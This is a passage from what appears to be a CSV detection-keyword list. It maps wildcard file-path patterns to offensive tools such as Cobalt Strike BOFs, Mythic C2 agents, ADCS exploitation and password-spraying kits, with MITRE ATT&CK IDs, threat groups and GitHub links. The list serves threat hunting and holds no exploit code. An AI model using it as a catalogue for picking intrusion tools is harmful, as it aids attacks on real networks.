- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/CertPol.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/ADCSKiller*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*/ADCSPwn.git*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*/add_computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/add_groupmember.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*/address-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/AddUser-Bof.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" +"*/AddUser-Bof/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" +"*/ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"*/ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*/ADHunt.git*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*/ad-ldap-enum.git*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD 
Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" +"*/adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"*/Admin2Sys.git*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" +"*/admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/ADRecon*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Information Gathering","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","1515","271","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z" +"*/ADSearch.git*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*/aerosol.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make 
password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/afp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afp-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afp-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afp-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afrog-pocs/*","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","1","N/A","N/A","10","2135","272","2023-09-28T09:41:46Z","2022-02-24T06:00:32Z" +"*/agent.ps1.oct*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*/agent/C/src/*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/agent/stagers/dropbox.py*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*/agent_code/Apollo/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/agent_code/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/agent_code/cmd_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/agent_code/dll.go*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/agent_code/merlin.*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/agent_code/powershell_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/agent_code/sh_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/agent_code/zsh_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/agent_functions/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/agent_icons/athena.svg*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AggressiveClean.cna*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/aggressor/*.java*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/aggressor-powerview*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 
- APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" +"*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/agscript *","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/agscript *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
